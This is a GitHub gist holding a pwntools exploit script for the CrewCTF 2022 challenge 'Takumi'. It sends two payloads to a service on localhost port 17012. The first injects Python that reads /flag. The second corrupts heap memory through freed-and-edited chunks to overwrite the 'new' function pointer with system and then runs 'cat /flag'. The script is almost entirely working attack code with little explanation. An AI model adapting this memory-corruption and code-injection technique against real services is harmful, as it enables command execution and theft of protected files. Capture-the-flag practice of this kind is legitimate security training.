Last active
April 18, 2022 06:34
-
-
Save reductor/51f031dbc2a2cdfb52adc33c75dabb99 to your computer and use it in GitHub Desktop.
CrewCTF 2022 : Takumi
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # -*- coding: utf-8 -*- | |
| # This exploit template was generated via: | |
| # $ pwn template --host localhost --port 17012 | |
| from pwn import * | |
| # Set up pwntools for the correct architecture | |
| context.update(arch='i386') | |
| exe = './path/to/binary' | |
| # Many built-in settings can be controlled on the command-line and show up | |
| # in "args". For example, to dump all data sent/received, and disable ASLR | |
| # for all created processes... | |
| # ./exploit.py DEBUG NOASLR | |
| # ./exploit.py GDB HOST=example.com PORT=4141 | |
| host = args.HOST or 'localhost' | |
| port = int(args.PORT or 17012) | |
| def start_local(argv=[], *a, **kw): | |
| '''Execute the target binary locally''' | |
| if args.GDB: | |
| return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) | |
| else: | |
| return process([exe] + argv, *a, **kw) | |
| def start_remote(argv=[], *a, **kw): | |
| '''Connect to the process on the remote host''' | |
| io = connect(host, port) | |
| if args.GDB: | |
| gdb.attach(io, gdbscript=gdbscript) | |
| return io | |
| def start(argv=[], *a, **kw): | |
| '''Start the exploit against the target.''' | |
| if args.LOCAL: | |
| return start_local(argv, *a, **kw) | |
| else: | |
| return start_remote(argv, *a, **kw) | |
| # Specify your GDB script here for debugging | |
| # GDB will be launched if the exploit is run via e.g. | |
| # ./exploit.py GDB | |
| gdbscript = ''' | |
| continue | |
| '''.format(**locals()) | |
| #=========================================================== | |
| # EXPLOIT GOES HERE | |
| #=========================================================== | |
| ## | |
| # Python based solution | |
| ## | |
| io = start() | |
| payload = """ | |
| print(open('/flag').read()) | |
| exit() | |
| EOF | |
| """ | |
| io.recvline() | |
| io.send(payload) | |
| data = io.recvall() | |
| print(data.decode('ascii')) | |
| io.close() | |
| exit() | |
| ## | |
| # Pwn based solution (change 'new' func to be 'system') | |
| ## | |
| io = start() | |
| payload = """ | |
| e_b = id(new) - 0x1e5bd0 | |
| n_offs = e_b + 0x8d00 | |
| e_v = id(new) | |
| s_f = id(id)-0x35d80 | |
| new(0, 128, 0) | |
| new(1, 128, 1) | |
| delete(0) | |
| delete(1) | |
| edit(1, n_offs) | |
| new(2, 128, 2) | |
| new(3, 128, e_v) | |
| for x in range(1, 7): | |
| edit(3, s_f+x*8) | |
| val = view(0) | |
| edit(3, e_v+x*8) | |
| edit(0, val) | |
| try: | |
| print(new("cat /flag")) | |
| except Exception as e: | |
| print("Failed2 ",e) | |
| exit() | |
| EOF | |
| """ | |
| io.recvline() | |
| io.send(payload) | |
| data = io.recvall() | |
| print(data) | |
| io.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment